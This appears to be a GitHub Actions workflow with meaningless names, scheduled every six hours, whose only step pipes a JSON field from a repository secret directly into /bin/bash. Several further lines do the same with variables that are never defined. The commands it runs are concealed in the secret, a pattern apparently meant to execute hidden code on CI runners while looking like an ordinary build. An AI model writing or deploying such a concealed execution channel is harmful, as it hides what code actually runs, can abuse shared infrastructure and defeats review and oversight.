name: zhuyhdaohy

on:
  workflow_dispatch:
  schedule:
    - cron: '4 3/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: zhuyhdaohy
        env:
          u7239: ${{ secrets.u7239 }}
        run: |
          echo $u7239 | jq -r .bpda92722 | /bin/bash
          echo $h4546 | jq -r .keay49850 | /bin/bash
          echo $ncucv873 | jq -r .yk2 | /bin/bash
          echo $ulpds32 | jq -r .n39770 | /bin/bash
          echo $b24 | jq -r .wcled46 | /bin/bash
          echo $hkds154 | jq -r .m2 | /bin/bash
          echo $p59337 | jq -r .cduov2233 | /bin/bash
          echo $zo9798 | jq -r .n7 | /bin/bash
          echo $qqj0 | jq -r .pfbao6920 | /bin/bash

